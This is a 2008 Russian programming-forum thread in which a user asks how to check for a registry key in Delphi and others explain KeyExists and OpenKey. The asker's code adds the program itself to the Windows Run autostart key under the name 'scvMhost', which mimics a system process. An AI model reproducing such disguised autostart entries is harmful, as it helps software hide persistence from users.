Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > IT форум > Помощь студентам
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 11.04.2008, 23:15   #1
Marsik
Форумчанин
 
Аватар для Marsik
 
Регистрация: 23.10.2007
Сообщений: 275
По умолчанию Проверка ключа в реестре

Здравствуйте! Как можно проверить наличие ключа в ресстре и при его отсутствии сделать соответствующую запись, а если есть то ничего не трогать и оставить как есть. Вот так делаю запись:
var
reg: tregistry;
begin
reg := tregistry.create;
reg.rootkey:=hkey_local_machine;
reg.lazywrite := false;
reg.openkey('software\microsoft\win dows\currentversion\run',false);
reg.writestring('scvMhost', application. exename);
reg.closekey;
reg.free;
http://otlishnik.com/ чудесный портал для всех кто учится. Рефераты, каталоГ вузов, решебники, справочники, ЕГЭ! Welcome
Marsik вне форума Ответить с цитированием
Старый 12.04.2008, 00:03   #2
Air
Участник клуба
 
Аватар для Air
 
Регистрация: 30.04.2007
Сообщений: 1,307
По умолчанию

Цитата:
Как можно проверить наличие ключа в ресстре и при его отсутствии сделать соответствующую запись, а если есть то ничего не трогать и оставить как есть.
Код:
if not reg.KeyExists('qwer') then //проверяем
 reg.openkey('qwer',true); // если нету - создаём
Всё гениальное - просто!
Air вне форума Ответить с цитированием
Старый 23.04.2008, 20:36   #3
Marsik
Форумчанин
 
Аватар для Marsik
 
Регистрация: 23.10.2007
Сообщений: 275
По умолчанию

а Я никак разобраться немогу! Можете привести с этим примером пожалуйста:
Код:
var
reg: tregistry;
begin
reg := tregistry.create;
reg.rootkey:=hkey_local_machine;
reg.lazywrite := false; 
reg.openkey('software\microsoft\windows\currentver sion\run',false);
reg.writestring('scvMhost', application. exename);
reg.closekey;
reg.free;
А то чтото не получается никак....
http://otlishnik.com/ чудесный портал для всех кто учится. Рефераты, каталоГ вузов, решебники, справочники, ЕГЭ! Welcome
Marsik вне форума Ответить с цитированием
Старый 23.04.2008, 22:00   #4
mihali4
*
Старожил
 
Регистрация: 22.11.2006
Сообщений: 9,201
По умолчанию

А что, в хэлпе посмотреть про OPENKEY влом? Другие пусть лазят и пересказывают маленькому мальчику?
mihali4 вне форума Ответить с цитированием
Старый 23.04.2008, 22:44   #5
Air
Участник клуба
 
Аватар для Air
 
Регистрация: 30.04.2007
Сообщений: 1,307
По умолчанию

Вот в этой функции
Код:
reg.openkey('software\microsoft\windows\currentversion\run',false);
Параметр false говорит нам о том, что если ветка не сеществует, то она не будет, ни создана, ни открыта.
Если поставить true то даже если ветка полностью не существует она всё равно будет создана и открыта.

Совет на будующее, таких вопросов на форуме около 1000, просто каждый по своему трактует вопрос.

Я в своё время изучил реестр, за 5-6 месецев и на форуме меня тогда небыло, это я к тому, что иногда стоит импровизировать, испытывать и добиваться результата собственными силами.
Всё гениальное - просто!
Air вне форума Ответить с цитированием
Старый 24.04.2008, 18:46   #6
Marsik
Форумчанин
 
Аватар для Marsik
 
Регистрация: 23.10.2007
Сообщений: 275
По умолчанию

Михалыч Ага..влом, т.к. Я заранее уверен, что если даже буду очень тщательно пытаться искать, то все равно ничего не найду либо не пойму на английском... Air огромное спасибо, в очередной раз помогли!
Цитата:
что иногда стоит импровизировать, испытывать и добиваться результата собственными силами.
ЭТО ТОЧНО!!!
http://otlishnik.com/ чудесный портал для всех кто учится. Рефераты, каталоГ вузов, решебники, справочники, ЕГЭ! Welcome
Marsik вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Поиск в реестре :( CrazyProgramer Общие вопросы Delphi 2 28.08.2008 01:43
проблема с определением внешнего ключа! veter_s_morya SQL, базы данных 1 26.06.2008 18:37
Поиск в реестре* не активном nivea Помощь студентам 3 14.01.2008 17:42
Дерево как в проводнике, реестре Valdis Общие вопросы Delphi 1 04.10.2007 00:02